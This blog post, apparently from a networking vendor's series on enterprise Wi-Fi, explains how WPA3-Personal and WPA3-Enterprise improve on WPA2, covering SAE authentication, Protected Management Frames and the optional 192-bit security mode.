WPA3: Why New Security Methods are Needed
Last week, we kicked off a new blog series about WPA3 in the enterprise. We took a brief look at the history of Wi-Fi security, most recently WPA2, and set the stage for WPA3. This week, we explore what makes WPA3 different from WPA2. While WPA2 may have served us well for many years, it will soon be time for WPA2 to join Betamax, cassette tapes, and 802.11b in the technology graveyard. WPA3 is the future of Wi-Fi security.
On the WPA3 Personal side, it disallows WEP & TKIP protocols and also requires the use of Protected Management Frames. There is also more resilient, password-based authentication with increased protections by replacing PSK with Simultaneous Authentication of Equals (SAE) from IEEE 802.11 specification, which is a secure key establishment protocol between devices, to provide stronger protections for users against password guessing attempts by third parties.
Key Things to Know About WPA3 Personal
- WPA3-Personal uses passwords for authentication by proving knowledge of the password and not for key derivation, which means the password is never shared during the key exchange protocol
- The SAE handshake negotiates a fresh Pairwise Master Key (PMK) per client, which is then used in a traditional Wi‑Fi four-way handshake to generate session keys
- Neither the PMK nor the password credential used in the SAE exchange can be obtained by a passive attack, active attack, or offline dictionary attack. That means WPA3 personal is resistant to offline dictionary attacks because each instance of the authentication exchange only allows both parties to guess the password once
- This removes the burden of users generating complicated passwords that are difficult to remember, reducing dependence on password strength
- The good news is that client devices supporting both WPA2-Personal and WPA3-Personal will connect using WPA3-Personal when available
WPA3 Enterprise networks also use the latest security methods and disallow legacy protocols, such as Temporal Key Integrity Protocol (TKIP) and WEP. WPA3 Enterprise also requires the use of Protected Management Frames (PMF). Disabling PMF for a WPA3-Enterprise network is not an option for new devices: PMF capable is required.
Key Things to Know about WPA3 Enterprise
- Optional 192-bit security, which provides additional security for segmented networks transmitting sensitive data, such as within government, healthcare, or finance
- WPA3-Enterprise 192-bit security ensures the right combination of cryptographic tools are used, and sets a consistent baseline of security within a WPA3 network
- 192-bit security mode specifies the configuration of each cryptographic component such that the overall security of the network is consistent. This not only delivers the desired security level but also makes provisioning easier. The approach is based on the concept that cryptographic primitives have a work factor necessary for a successful attack, and an attacker will target the weakest component in a system
- WPA3-Enterprise does not fundamentally change the protocols defined in WPA2-Enterprise, and client devices will continue to interoperate with WPA3-Enterprise networks
Next time, we will look further in-depth at key timelines to consider for WPA3 adoption, questions to ask your vendors, and what to consider when planning for network upgrades.